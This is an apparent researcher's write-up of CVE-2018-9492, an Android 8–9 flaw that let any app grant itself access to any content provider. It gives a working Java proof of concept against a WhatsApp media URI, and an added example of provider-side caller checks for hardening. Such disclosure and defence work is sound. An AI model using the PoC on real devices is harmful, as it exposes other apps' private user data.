Global grant URI in Android 8.0-9.0 (2018)

Any third-party application was able to grant itself read/write access to any content provider installed on the system, whether exported or non-exported, even when it was secured by permissions. It didn't matter whether the content provider was declared in AndroidManifest with the grantUriPermissions flag or not, or whether it was exported or not. Third-party apps were able to access any content provider in the system without user interaction.

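// Content URI of a provider that the calling app holds no permission for
Uri uri = Uri.parse("content://com.whatsapp.provider.media/item/5");
// The intent is addressed to the calling app's own activity
Intent intent = new Intent(Intent.ACTION_MAIN);
intent.setClassName(getPackageName(), MainActivity.class.getName());
// Read, write and persistable grant flags for the URI carried by the intent
intent.addFlags(Intent.FLAG_GRANT_WRITE_URI_PERMISSION);
intent.addFlags(Intent.FLAG_GRANT_READ_URI_PERMISSION);
intent.addFlags(Intent.FLAG_GRANT_PERSISTABLE_URI_PERMISSION);
// The URI is attached as EXTRA_STREAM
intent.putExtra(Intent.EXTRA_STREAM, uri);
intent.setType("*/*");
startActivity(intent);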

And that's all :) When you launch that code on a vulnerable Android version, your app receives access to the passed "uri" value. You can open any content provider in the system!

This funny bug was reported on 30.08.2018.
And then:
The Android Security Team believes that this is a duplicate of a report previously submitted by another external researcher on July 26, 2018.

So, for me, it was a duplicate.
The original bug information is as follows:

  • CVE-2018-9492
  • Author: Michał Bednarski
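
Provider-side hardening, as an added example that is not part of the original post or of any app named in it: a provider holding sensitive data can check the Binder caller itself, so that access does not rest only on the framework's URI grant bookkeeping. The class name, the "media" directory and the same-signature trust rule are assumptions made for this example.

```java
import android.content.ContentProvider;
import android.content.ContentValues;
import android.content.pm.PackageManager;
import android.database.Cursor;
import android.database.MatrixCursor;
import android.net.Uri;
import android.os.Binder;
import android.os.ParcelFileDescriptor;
import android.os.Process;
import java.io.File;
import java.io.FileNotFoundException;

// Hypothetical provider for this example; every name here is an assumption.
public class PrivateMediaProvider extends ContentProvider {

    // Throws unless the caller is this app or an app signed with the same certificate.
    // A URI grant lets a request through the framework check, but the Binder calling
    // UID is still the requesting app's UID, so this check still sees who is asking.
    private void enforceTrustedCaller() {
        int caller = Binder.getCallingUid();
        if (caller == Process.myUid()) return;
        PackageManager pm = getContext().getPackageManager();
        if (pm.checkSignatures(caller, Process.myUid()) != PackageManager.SIGNATURE_MATCH) {
            throw new SecurityException("UID " + caller + " is not allowed to use this provider");
        }
    }

    @Override public boolean onCreate() { return true; }

    @Override
    public Cursor query(Uri uri, String[] projection, String selection, String[] args, String sort) {
        enforceTrustedCaller();
        MatrixCursor c = new MatrixCursor(new String[] {"_display_name"});
        c.addRow(new Object[] {uri.getLastPathSegment()});
        return c;
    }

    @Override
    public ParcelFileDescriptor openFile(Uri uri, String mode) throws FileNotFoundException {
        enforceTrustedCaller();
        // Serve only regular files directly inside the private "media" directory, read-only.
        String name = uri.getLastPathSegment();
        File f = new File(new File(getContext().getFilesDir(), "media"), name == null ? "" : name);
        if (name == null || name.contains("/") || !f.isFile()) throw new FileNotFoundException(String.valueOf(uri));
        return ParcelFileDescriptor.open(f, ParcelFileDescriptor.MODE_READ_ONLY);
    }

    @Override public String getType(Uri uri) { enforceTrustedCaller(); return "application/octet-stream"; }
    @Override public Uri insert(Uri uri, ContentValues v) { throw new UnsupportedOperationException(); }
    @Override public int delete(Uri uri, String s, String[] a) { throw new UnsupportedOperationException(); }
    @Override public int update(Uri uri, ContentValues v, String s, String[] a) { throw new UnsupportedOperationException(); }
}
```

A caller check like this also rejects legitimate URI grants to other apps, so it only fits providers that are never meant to share data outside the app's own signing identity.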
